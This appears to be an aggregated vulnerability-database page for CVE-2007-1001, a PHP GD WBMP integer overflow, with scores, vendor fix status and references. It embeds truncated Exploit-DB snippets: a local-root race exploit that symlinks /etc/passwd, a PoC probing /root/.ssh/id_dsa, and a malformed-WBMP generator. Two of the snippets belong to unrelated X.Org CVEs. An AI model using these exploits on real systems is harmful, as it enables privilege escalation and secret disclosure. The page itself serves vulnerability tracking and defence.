CVE-2007-1001
Published 2007-04-06
Priority P340 · medium · 6.8 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available (see Exploit-DB below)
EPSS: 8.32% (94.2th percentile)
Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.
Affected
53 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libgd2 | < libgd2 2.0.33-1 (bookworm) | libgd2 2.0.33-1 (bookworm) |
| php | php | — | — |
CVSS provenance
- nvd (CVSS 2.0): 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P
- osv: 6.8 MEDIUM
- vendor_debian: 6.8 MEDIUM
- vendor_redhat: 6.8 MEDIUM
GHSA
GHSA-62rc-79c5-9jv7 · ghsa_unreviewed · 2022-05-01 · CVE-2007-1001 [MEDIUM]: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c
OSV
CVE-2007-1001 · osv · 2007-04-06 · CVSS 6.8 [MEDIUM]: Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c
Red Hat
security flaw · vendor_redhat · 2007-03-10 · CVSS 6.8 [MEDIUM]
Statement: This issue was fixed in php package updates for Red Hat Enterprise Linux and Red Hat Application Stack:
http://rhn.redhat.com/cve/CVE-2007-1001.html
This issue did not affect the versions of gd as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
Debian
libgd2 · vendor_debian · 2007 · CVSS 6.8 [MEDIUM]: CVE-2007-1001 - Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c
Scope: local
bookworm: resolved (fixed in 2.0.33-1)
bullseye: resolved (fixed in 2.0.33-1)
forky: resolved (fixed in 2.0.33-1)
sid: resolved (fixed in 2.0.33-1)
trixie: resolved (fixed in 2.0.33-1)
No detection rules found.
Exploit-DB
CVE-2007-3103 [MEDIUM] · exploitdb · 2008-02-21 · CVSS 6.2: X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition
---
```sh
#!/bin/sh
# Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103)
#
# Another lame xploit by vl4dZ :)) works on redhat el5 and before
#
# $ id
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# $ sh xfs-RaceCondition-root-exploit.sh
# [*] Generate large data file in /tmp/.font-unix
# [*] Wait for xfs service to be (re)started by root...
# [*] Hop, symlink created...
# [*] Launching root shell
# -sh-3.1# id
# uid=0(root) gid=0(root) groups=0(root)
# Vulnerable version is xorg-x11-xfs sym.c
int main(){
for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0)
{return 0;}}}
EOF
cc sym.c -o sym>/dev/null 2>&1
if [ $? != 0 ]; then
printf "Error: Cant compile code"
exit 1
fi
printf "[*] Generate large data file in $FontDi
```
Exploit-DB
CVE-2007-5958 [MEDIUM] · exploitdb · 2008-02-19 · CVSS 5.0: X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)
---
```sh
#!/bin/sh
# Xorg file disclosure vulnerability (CVE-2007-5958)
#
# Lame xploit by vl4dZ :))
#
# sh-3.1$ whoami
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa
# ...
# *** FILE /root/.ssh/id_dsa EXIST !! ***
# Vulnerable: xorg-server "
exit 1
fi
[ -f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1)
echo -e "\n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **\n"
echo "A second X server is going to be started, once started, type the "
echo "ctrl+Alt+Backspace sequence and you'll see the result of your request."
echo -en "\nType [Enter] to start: "; read
LANG=c ${X_EXEC} :1 -ac -sp $1 2> ${TMP_FILE}
grep "error opening security policy file" ${TMP_FILE} >/de
```
Exploit-DB
CVE-2007-1001 · exploitdb · 2007-04-07: PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow
---
// source: https://www.securityfocus.com/bid/23357/info
PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.
Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.
PHP 5.2.1 and prior versions are vulnerable.
```c
#define BUFSIZE 1000000
#include <stdio.h>   /* header name lost in extraction; restored for fopen/fputc */
int main()
{
int c;
char buf[BUFSIZE];
FILE *fp = fopen("test.wbmp","w");
//write header
c = 0;
fputc(c,fp);
fputc(c,fp);
//write width = 2^32 / 4 + 1
c = 0x84;
fputc(c,fp);
c = 0x80;
fputc(c,fp);
fputc(c,fp);
fputc(c,fp);
```
References
- http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?r1=1.2.4.1&r2=1.2.4.1.8.1
- http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/wbmp.c?revision=1.2.4.1.8.1&view=markup
- http://docs.info.apple.com/article.html?artnum=306172
- http://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html
- http://lists.apple.com/archives/security-announce//2007/Jul/msg00004.html
- http://rhn.redhat.com/errata/RHSA-2007-0155.html
- http://secunia.com/advisories/24814
- http://secunia.com/advisories/24909
- http://secunia.com/advisories/24924
- http://secunia.com/advisories/24945
- http://secunia.com/advisories/24965
- http://secunia.com/advisories/25056
- http://secunia.com/advisories/25151
- http://secunia.com/advisories/25445
- http://secunia.com/advisories/26235
- http://security.gentoo.org/glsa/glsa-200705-19.xml
- http://us2.php.net/releases/4_4_7.php
- http://us2.php.net/releases/5_2_2.php
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:087
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:088
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:089
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:090
- http://www.novell.com/linux/security/advisories/2007_32_php.html
- http://www.redhat.com/support/errata/RHSA-2007-0153.html
- http://www.redhat.com/support/errata/RHSA-2007-0162.html
- http://www.securityfocus.com/archive/1/464957/100/0/threaded
- http://www.securityfocus.com/archive/1/466166/100/0/threaded
- http://www.securityfocus.com/bid/23357
- http://www.securityfocus.com/bid/25159
- http://www.slackware.org/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053
- http://www.vupen.com/english/advisories/2007/1269
- http://www.vupen.com/english/advisories/2007/2732
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33453
- https://issues.rpath.com/browse/RPL-1268
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10179